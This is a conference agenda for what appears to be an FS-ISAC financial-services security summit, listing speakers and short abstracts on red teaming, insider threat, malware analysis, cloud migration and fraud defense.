As FIs, we have to comply with regulations surrounding our technology, but how do we bridge the gap between Risk Management and Technology? Tackling Risk Management actually leads to better compliance, and regulators are increasingly asking for the "Why" something is implemented, even considering it more important than the specific "what" was implemented. During this presentation, we'll discuss strategies to embed Risk Management into our System Life Cycle activities proactively.

 
3:00 PM

Networking Break

3:30 PM

Mobile Risk and Compliance in a Post-Perimeter Era

Mr. Aaron Cockerill, Lookout

Event Toggle Arrow

With the majority of fraudulent transactions take place on mobile devices and the volume of those transactions increasing, this session will explore its risk and compliance. Attendees will leave with a new understanding of how a post-perimeter security model, which applies a risk-based approach to authentication, can be applied to mobile devices.

3:30 PM

(Repeat) Synthetic Identity: Are You Who You Say You Are?

Mr. Kevin Thomsen, Bank of America

Event Toggle Arrow

This session provides attendees with an overview of synthetic identity; a combination of fabricated credentials where the implied identity is not associated with a real person. Presenters will explain how fraudsters are exploiting this gap for financial gain and why synthetic identity is a blind spot for some financial institutions, due to organizational structure. The session will conclude with the latest on what’s being done at the industry-level and a high-level overview of what the banks are doing to mitigate risk.

3:30 PM

(Repeat) Making a Cyber Awareness Program Sexy

Mr. Mandouh Csintalan, RenaissanceRe

Event Toggle Arrow

Security often struggles to capture the attention of other departments. But when a security incident occurs, security teams get all of the attention, and oftentimes the blame. This session reviews how security departments can push cyber-awareness programs within their organizations before an incident happens. The financial-services industry is among the most targeted for sophisticated cyber-attacks. We must train colleagues to be an extension of our cyber-army to thwart attacks.

3:30 PM

(Repeat) Using Behavior Analytics to Predict, Detect and Stop Insider Threats

Mr. Bryan Sheppard, State Farm

Event Toggle Arrow

Conventional cybersecurity tools, such as those aimed at data-loss prevention, intrusion-prevention, security-information and event-management, and network-monitoring, focus on defending the perimeter and offer little in the way of protecting against insider threats. IT security teams cannot monitor every action taken by every employee, consultant and privileged user, using manual processes. In this session, attendees will explore State Farm’s insider threat program and learn how the company’s user and entity behavior analytics platform compares real-time user behavior to base-lined, normal behavior.

3:30 PM

(Repeat) Partnering Offense and Defense: A Purple Team’s Journey

Mr. Chris Blow, Liberty Mutual and Mr. Brian Riley, Liberty Mutual

Event Toggle Arrow

Internal red and purple teaming have seen a large uptick in popularity within the past five years. Unfortunately, not all implementations are successful for reasons ranging from budgetary and scope constraints, lack of forward-thinking vision, executive buy-in and structure. In this session, Liberty Mutual Insurance will share its purple team journey and how it’s driven material improvements toward its security program. Attendees will gain knowledge that will assist in creating a successful team of their own.

3:30 PM

(Repeat) What to Expect When Expecting a Pen Test

Mr. Tony Drake, ICE / NYSE

Event Toggle Arrow

Penetration Tests. We all do them. The regulators require them. The board wants to see them. But they are taking more time, more resources and more effort. So how do we move from just ticking a box and saving a report, to a test that creates value and moves the needle on security and your security program as a whole? This session starts from the basic premise that you're already doing a pen-test and then walks through pen-testing from inception to planning, execution, followup and remediation. This session aims to lay out the pitfalls and traps that await any pen-testing plan and how to avoid them.

 
4:15 PM

Silver Showcase: Cybersecurity Hygiene Showcase

Mr. Miguel Sian, Cyber Observer

4:30 PM

Silver Solutions Showcase: NDR: The New Kid on the Block

Mr. Tanner Payne, Extrahop Networks

4:30 PM

Silver Solutions Showcase: 'How Secure Are We?'

Mr. Jesse Martin-Alexander, Tenable, Inc

4:30 PM

Silver Solutions Showcase: Finally a Next-Gen Anti-Phishing Solution

Mr. Mucteba Celik, RevBits LLC

4:30 PM

Silver Solutions Showcase: Eliminate Shadow Risk by Emulating Attacker Reconaissance

Mr. Rob Gurzeev, CyCognito

4:30 PM

Silver Solutions Showcase: Why Collective Defense Matters

Mr. Gareth Owen, IronNet Security

5:30 PM

Reception

Wednesday 20 November

7:00 AM

Breakfast

8:00 AM

FS-ISAC Opening Remarks

8:15 AM

Breaking Down Silos: How CISOs Can Streamline ID Management

Mr. Rakesh Loonkar, Transmit Security

Event Toggle Arrow

CISOs at leading enterprises are shortening the time, from months to hours, to deliver identity-related projects using an integrated authentication and fraud-detection platform. In this session, attendees will hear firsthand the problems with identity management, along with solutions which t add an Identity and Access Management (IAM) orchestration layer to their environments. This session will also review how organizations bogged down with IAM deployment can find faster ways to introduce authentication technologies.

8:45 AM

Reducing Risk with Self-Hosted Open Source Messaging

Mr. Ian Tien, Mattermost, Inc.

Event Toggle Arrow

To accelerate innovation, while also increase security and reduce risk, many leading financial services firms are moving to an open-source, Slack-compatible workplace messaging platform. Attendees will uncover how and why open-source messaging is more secure than other popular messaging platforms. Presenters will also discuss how firms are using the platform to increase DevOps productivity and improve team collaboration.

9:15 AM

Using Threat Objectives to Strategize and Measure Your Security Program

Mr. Jerry Perullo, ICE / NYSE

Event Toggle Arrow

Faced with competing and confusing vocabularies around threats, risks, and priorities, the presenter will share a set of 10 high-level threat objectives and demonstrate how this taxonomy has helped to organize strategic, operational and tactical initiatives. Attendees will hear how to deliver threat intelligence to the board, respond to breaches in the news, setup the “Red Team” calendar and prioritize remediation efforts.

9:45 AM

Networking Break

10:15 AM

Cloud Best Practices for Broker Dealers

Mr. Peter Falco, FS-ISAC

Event Toggle Arrow

A panel of Broker Dealers will provide their experiences and perspectives on either implementation or regulatory processes with cloud providers. This session will provide the attendees with techniques, strategies, and processes to navigate the cloud implementation journey at their own firms or assist in the creation of cloud strategies as their organizations prepare for implementation challenges.

10:15 AM

Lessons Learned from a Bank Moving 100% to the Cloud

Mr. Steven Lodin, Sallie Mae

Event Toggle Arrow

Presenters will share observations regarding the process of moving the data center assets of a Top 100 bank entirely to the cloud. Attendees will discuss the golden rules for providing security and assurance during a full cloud migration, as well as the gotchas, surprises, lessons learned and the resulting strategic changes, to raise awareness and prevent future mistakes.

10:15 AM

Protecting Data at Scale

Mr. Omkhar Arasaratnam, JPMorgan Chase & Co., Mr. Tim Brophy, JPMorgan Chase & Co., and Mr. TJ Klevinsky, JPMorgan Chase & Co.

Event Toggle Arrow

Securing data across a large, multinational firm is complex because data is mobile and all trust boundaries are not equal. This session reviews how JPMorgan Chase's data protection experts are using novel methods to build next-generation data protection systems at scale. The presentation focuses on lessons learned from JPMC’s experience in developing a next-gen data-protection platform, including key decisions and discussions surrounding data classification and programmatic data handling; buying versus building the platform; top-down vs. bottoms-up data governance; and convincing internal teams to adopt the platform.

 
10:15 AM

Striving for Cyber Resilience

Dr. Yonesy Nunez, Wells Fargo and Mr. Elon Ginzburg, Wells Fargo

Event Toggle Arrow

This presentation will take a deep dive into the area of Cyber Resilience. We will start by reviewing the current state of affairs around the increasingly popular term of cyber-resilience. In doing so, we’ll look at a variety of interoperations organizations are using and what it means to actually be ‘cyber-resilient’. The presenters will share their view of what it means to be cyber resilient in today’s Financial industry. In addition, we’ll discuss how common design principles often align to modern development practices as well as how cyber-resilience requires both specialist security activity and the development of wider organisational capabilities. Finally, we’ll explore some of the key challenges in getting to a resilience state while attempting to provide practical examples and lessons learnt.

 
10:15 AM

Vulnerability Management and Risk Assessments: A Holistic EcosystemActivity Title

Ms. Jessica Colvin, JPMorgan Chase and Ms. Megan Larson, JPMorgan Chase

Event Toggle Arrow

This presentation reviews JPMorgan Chase's approach to vulnerability management and risk assessment, and how the bank is effectively discovering, assessing, mitigating and remediating vulnerabilities at scale across an organization with approximately 250,000 employees globally. The session provides an overview of how one international banks is thinking about its approach to vulnerability management and risk assessment within the context of technology estates and transforming at pace, while still maintaining focus on protecting the firm and meeting our regulatory requirements.

 
11:15 AM

(Repeat) Lessons Learned from a Bank Moving 100% to the Cloud

Mr. Steven Lodin, Sallie Mae

Event Toggle Arrow

Presenters will share observations regarding the process of moving the data center assets of a Top 100 bank entirely to the cloud. Attendees will discuss the golden rules for providing security and assurance during a full cloud migration, as well as the gotchas, surprises, lessons learned and the resulting strategic changes, to raise awareness and prevent future mistakes.

11:15 AM

PowerShell for Security Nerds

Mr. Aaron Katz, SP Global

Event Toggle Arrow

PowerShell is an extremely powerful administrative and automation tool that enables attackers and defenders alike to do devastating things to your network. This session explores PowerShell's capabilities, why attackers love it and highlights defenses the blue team can use to prevent and detect PowerShell abuse. Presenters also will share case studies about attackers’ previous uses and mitigation techniques.

11:15 AM

Member Authentication – A Medium-Sized Credit Union’s Story

Ms. Krista Baum, WSECU, Mr. Aaron Robel, WSECU and Mr. Rod Bell, WSECU

Event Toggle Arrow

Four years ago, WSECU, a Washington state credit union had an aging online banking platform, several third-party online financial tools for membership and up to four different types of online logins per member. Fraudsters preyed on members with phishing attacks. Attendees will discuss the challenges of getting the credit union's leadership aligned to fix digital identities and create a realistic roadmap. Presenters will also share the challenges of getting technologies on-boarded with a small team and the present state of single sign-on.

11:15 AM

(Repeat) Protecting Data at Scale

Mr. Omkhar Arasaratnam, JPMorgan Chase & Co., Mr. Tim Brophy, JPMorgan Chase & Co., and Mr. TJ Klevinsky, JPMorgan Chase & Co.

Event Toggle Arrow

Securing data across a large, multinational firm is complex because data is mobile and all trust boundaries are not equal. This session reviews how JPMorgan Chase's data protection experts are using novel methods to build next-generation data protection systems at scale. The presentation focuses on lessons learned from JPMC’s experience in developing a next-gen data-protection platform, including key decisions and discussions surrounding data classification and programmatic data handling; buying versus building the platform; top-down vs. bottoms-up data governance; and convincing internal teams to adopt the platform.

11:15 AM

Defending Your Enterprise With Acronyms

Mr. Joe McMann, Capgemini

12:00 PM

Lunch

1:00 PM

Integrating Hunting & Forensic Triage into Insider Risk Programs

Mr. Doug Koster, American Express

Event Toggle Arrow

This session will highlight the importance of integrating hunting and computer forensic triage into an existing insider risk program. Attendees will hear real world examples of how they have led to enhanced enterprise risk reduction. Presenters will also discuss hunting for anti-forensic tools, administrative shares, unapproved software and malware.

1:00 PM

Dissecting Android Malware

Ms. Marita Fowler, Capital One and Ms. Kathryn Torelli, Capital One

Event Toggle Arrow

In this session, analysts will perform a live dissection of a malicious Android Package Kit (APK), explaining each step, allowing attendees to gain an understanding of the important APK components and the role they play in analysis. The presenters will also discuss the different criminals running these operations and ongoing initiatives that counter them. Attendees will leave with a deeper understanding of the malware threat landscape and a list of analysis tools and resources.

1:00 PM

(Repeat) Member Authentication – A Medium-Sized Credit Union’s Story

Ms. Krista Baumm WSECU, Mr. Aaron Robel, WSECU and Mr. Rod Bell, WSECU

Event Toggle Arrow

Four years ago, WSECU, a Washington state credit union had an aging online banking platform, several third-party online financial tools for membership and up to four different types of online logins per member. Fraudsters preyed on members with phishing attacks. Attendees will discuss the challenges of getting the credit union's leadership aligned to fix digital identities and create a realistic roadmap. Presenters will also share the challenges of getting technologies on-boarded with a small team and the present state of single sign-on.

1:00 PM

Repeated: Striving for Cyber Resilience

Dr. Yonesy Nunez, Wells Fargo and Mr. Elon Ginzburg, Wells Fargo

Event Toggle Arrow

This presentation will take a deep dive into the area of Cyber Resilience. We will start by reviewing the current state of affairs around the increasingly popular term of cyber-resilience. In doing so, we’ll look at a variety of interoperations organizations are using and what it means to actually be ‘cyber-resilient’. The presenters will share their view of what it means to be cyber resilient in today’s Financial industry. In addition, we’ll discuss how common design principles often align to modern development practices as well as how cyber-resilience requires both specialist security activity and the development of wider organisational capabilities. Finally, we’ll explore some of the key challenges in getting to a resilience state while attempting to provide practical examples and lessons learnt.

 
1:15 PM

Data Privacy as a Technology and Business Enabler

Ms. Sarah Ponge, E&Y

1:45 PM

Networking Break

2:15 PM

Why Internet Routing Security Matters to Financial Institutions

Andrei Robachevsky (Internet Society), Andrew Gallo (George Washington University), Karl Schimmeck (Morgan Stanley) and Steve Silberstein (FS-ISAC)

Event Toggle Arrow

You likely see too many headlines today about internet routing going wrong, leading to latency issues, man-in-the-middle attacks, theft and more. FS-ISAC in partnership with the Internet Society wants to help members be proactive in solving these issues. This panel discussion of a community-led initiative called Mutually Agreed Norms for Routing Security (MANRS) reviews crucial fixes designed by MANRS that are reducing the most common routing threats. The panel will also discuss how members and network operators should work together to protect the core of the internet and themselves.

2:15 PM

Physical Pen-Testing: A Must-Have for Overall Security

Mr. Chris Carlis, Zurich Insurance Group

Event Toggle Arrow

Cybersecurity areas of responsibility and threat modeling will often bump physical pen-testing to the bottom of the list. This session discusses the roles and responsibilities of the information security team in protecting an organization’s physical security. The session reviews how to reframe the discussion with higher-ups to better represent the risks and benefits and how to jumpstart the testing process by running through some of the more common TTPs used today.

2:15 PM

The Potential Impact of Deepfakes on Market Manipulation

Ms. Anna Skelton, Bank of America

Event Toggle Arrow

Deepfakes, videos that use AI-based technology to create or alter content to misrepresent the truth, are becoming more indistinguishable from reality. Attendees will gain insight into how threat actors are increasingly using this technology to create content that could cause significant market disruption. Presenters will also discuss the proliferation of this content via social media and its potential to immediately impact global economies.

2:15 PM

Cross-Sector Sharing: How It Benefits Financial Institutions

Mr. Errol Weiss, H-ISAC and Mr. Bill Nelson, Global Resilience Federation

Event Toggle Arrow

Threat actors don’t just target one industry. In many cases, the same malware is used to attack a variety of sectors. The National Council of ISACs and the Global Resilience Federation each play an important role in sharing attack data, as well as providing technological and analytical support for various sectors to consume and report information. Attendees will examine case studies on the effective use of cross-sector sharing to defend against cyberattacks.

2:15 PM

Leveraging Cyberthreat Intel to Find Account Takeover Activity

Mr. David DeLuca, Vanguard and Mr. Chris Plaisance, Vanguard

Event Toggle Arrow

Account takeover activity is on the rise and a consistent problem for financial firms. This session reviews how to leverage cyber-intelligence with your fraud department to identify and prevent account takeovers. Attendees will discover that fusing the two teams will empower one cohesive team to emerge and combat account takeover activity. Presenters will demonstrate how this partnership provides additional protection to clients and discuss how automation streamlines the process, resulting in meaningful and measurable metrics.

2:15 PM

An Update From the FS-ISAC Measurements Working Group

Ms. Carin Salonia, The Hartford, Ms. Sarah Lachance, Liberty Mutual, Mr. Sounil Yu, Independent Presenter

Event Toggle Arrow

Information security programs have a critical need to measure and manage the risk within an environment: from threat identification and protection, to risk mitigation, compliance and executive reporting. A uniform framework within the information security industry or the financial services sector does not currently exist. The FS-ISAC Measurements Working Group was created to develop a uniform set of measurements that FIs may adopt. Attendees will learn how the group was created, where the group is now and the remaining activities to have a defined set of measurements.

2:15 PM

(Repeat) PowerShell for Security Nerds

Mr. Aaron Katz, SP Global

Event Toggle Arrow

PowerShell is an extremely powerful administrative and automation tool that enables attackers and defenders alike to do devastating things to your network. This session explores PowerShell's capabilities, why attackers love it and highlights defenses the blue team can use to prevent and detect PowerShell abuse. Presenters also will share case studies about attackers’ previous uses and mitigation techniques.

2:30 PM

Red Team Best Practices

Mr. Conner Finlay, T. Rowe Price

Event Toggle Arrow

This session is a must for implementing a red team at a smaller FI. Conducting such an operation presents unique challenges, which may not be as prevalent in other industries. Attendees will hear what works, doesn't work and recommendations.

2:45 PM

Building a Cyber Education Program

Mr. Jim Orr, Independent Financial

Event Toggle Arrow

How can an enterprise educate employees and strengthen what is considered to be the weakest link in the cybersecurity of a bank? Attendees will hear from a financial institution that has created a comprehensive cybersecurity education program for its employees. Presenters will also share incentives and other proven tactics resulting in increased participation in their institution’s phishing campaigns.

3:15 PM

Mobile Risks: Always Connected, Always a Threat

Mr. Ray Richards, PNC

Event Toggle Arrow

The exponential growth of mobile device technology has made mobile device security a top priority for modern enterprises. As more companies integrate mobile technology into their daily operations, these devices have become a more lucrative target for attackers. Businesses expect constant employee connectivity, but the sensitive data employees work with puts employees at greater risk. Presenters will review the real mobile threats — separating vendor hype from actual risk — and will offer tips on how to mitigate vulnerabilities.

3:15 PM

Proactive Insider Threat – The Convergence of Information Security, Legal and HR

Mr. George Albero, Bank of America, Ms. Shelley Thomas, Bank of America, Mr. David Nardoni, Bank of America and Mr. Scott Randolph, Bank of America

Event Toggle Arrow

Attendees will discuss the convergence of binary metric data points from across an enterprise to create a holistic view of employees, while protecting privacy. This view enables the effective and non-discriminatory application of enhanced controls to proactively detect and prevent insider threats, while mitigating legal and operational risk to the institution.

3:15 PM

Metrics-Driven Security

Mr. Aaron Katz, SP Global

Event Toggle Arrow

Everyone knows how important information security is, right? That's why you got all that funding for your program. But how do you measure that success and show management an appropriate return on their investment? Being able to formulate a risk appetite, with supporting metrics, is crucial to running a successful information security program. This session explores various metrics and measures that can be presented at multiple levels of management, from the SOC manager all the way to the board of directors. These metrics can communicate the overall health of the program from an operational perspective, as well as provide key information to business stakeholders to allow informed decisions to be made.

3:15 PM

A Head Start to Create a Red Team

Ms. Stacy Monroe, Principal Financial Group and Mr. Tom Ervin, Principal Financial Group

Event Toggle Arrow

An effective security program helps ensure the safe management of high-asset customers. Integrity guides the culture at Principal Financial Group, where regular analysis aims to advance and improve the security perimeter and find the best ways to understand weaknesses. In January 2019, Principal Financial Group launched its red team service. This session explains the process used by Principal Financial Group to operationalize its red team. Attendees will learn exactly what a red team does and identify the value the red team brings, find ways to hire the right talent (based on skillset) for the red team, and identify gotchas any red team should be anticipating for the future.

3:15 PM

FSSCC Cybersecurity Profile: Community Institution Implementation

Ms. Joyce Flinn, First United Bank & Trust

Event Toggle Arrow

Various regulatory agencies are asking the same question in several ways, stretching already scarce cybersecurity talent. This is especially true for community institutions. This session will explore the logic behind the development of the FSSCC Cybersecurity Profile. Community institutions will discuss moving to the new profile and review the implementation process and lessons learned. Panelists will also discuss the first exam cycle utilizing the profile and regulatory acceptance.

3:15 PM

Developing a process for Direct Deposit BEC phishing

Mr. Pierre Lamy, S&P Global

Event Toggle Arrow

Doable for even new intelligence teams, this session will showcase a new threat intelligence program where the service catalog is built with multiple workflows and services. One of the key services is the direct deposit BEC phishing response. This presentation will detail the processes to execute, how to disseminate intelligence and feedback on this new program.

3:15 PM

(Repeat) Integrating Hunting & Forensic Triage into Insider Risk Programs

Mr. Doug Koster, American Express

Event Toggle Arrow

This session will highlight the importance of integrating hunting and computer forensic triage into an existing insider risk program. Attendees will hear real world examples of how they have led to enhanced enterprise risk reduction. Presenters will also discuss hunting for anti-forensic tools, administrative shares, unapproved software and malware.

4:15 PM

Jeoparty